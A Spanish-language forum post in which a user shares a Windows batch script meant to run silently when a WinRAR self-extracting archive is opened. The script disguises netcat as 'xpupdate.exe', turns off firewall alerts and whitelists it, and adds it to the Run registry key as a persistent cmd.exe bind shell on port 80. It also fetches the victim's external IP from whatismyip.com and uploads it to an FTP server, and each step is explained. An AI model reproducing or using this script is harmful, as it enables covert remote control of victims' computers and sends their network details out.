Hola a todos, antes de nada saludar ya que es el primer post que pongo en el foro.
Mi técnica para el envío de la ip externa va un poco en relación con el ultimo post de chestmaster, ya que yo realizo la conexión inversa usando netcatt oculto con el winrar y ejecuto un bat en la descompresion del archivo que pego a continuación y espero que te ayude:
@echo off
netsh
set mode offline
set allowedprogram c:\windows\system32\xpupdate.exe allow_nc ENABLE
copy xpupdate.exe c:\windows\system32\
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v xpupdate /t REG_SZ /d "C:\windows\system32\xpupdate -l -d -e cmd.exe -p 80"
xpupdate whatismyip.com 80 < html.txt > out.out
ftp
open
ftp.ftp.es
user
pass
ascii
put out.out
bye
xpupdate -l -d -e cmd.exe -p 80
exit
Vamos a comentar que hace:
netsh --------vamos al modo de control del firewall de xp
set mode offline---- Le indicamos que desactive las alertas
set allowedprogram c:\windows\system32\xpupdate.exe allow_nc ENABLE- Damos paso al netcat (renombrado a xpupdates.exe) en el firewall
copy xpupdate.exe c:\windows\system32\- Lo copiamos a un sitio adecuado
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v xpupdate /t REG_SZ /d "C:\windows\system32\xpupdate -l -d -e cmd.exe -p 80" Aqui lo introducimos en el registro de inicio para que cada vez que arranque el sistema lo ponga a escuchar en un Puerto determinado y nosotros podamos conectarnos.
xpupdate whatismyip.com 80 < html.txt > out.out Aquí uso el propio netcat para enviar una cabecera httpo adecuada a la pagina whatismyip.com (la cual nos indica la ip externa desde la que nos conectamos) y asi poder guardar en un archivo de texto (out.out) el resultado, que sera la ip externa de la victima. Muy necesaria si pretendemos saber donde atacar XD…
ftp Estos pasos solo me envían por ftp esa información aunque podríamos hacerlo de muchas otras formas como una web, etc
open
ftp.ftp.es
user
pass
ascii
put out.out
bye
xpupdate -l -d -e cmd.exe -p 80 Aquí es donde indicamos al netcat que se quede a la escucha para cuando queramos conectarlo. Además lo hace a través del puerto 80 para asegurarnos que el router lo deje pasar.
exit
El contenido de la cabecera http adecuada para el paso xpupdate whatismyip.com 80 < html.txt > out.out se guarda en el archivo html.txt que pego a continuación y que consegui con el software Httpanalizer haciendo una simple captura de la consulta a dicha página.
GET / HTTP/1.1
Accept: */*
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Si os gusta el post puedo incluir un manual completo con capturas de pantalla que yo mismo he realizado, aunque toda la información necesaria para hacerlo salio de esta completa webbbb saludos a todos
pd: Me acabo de desvirgar en el foro jejejeje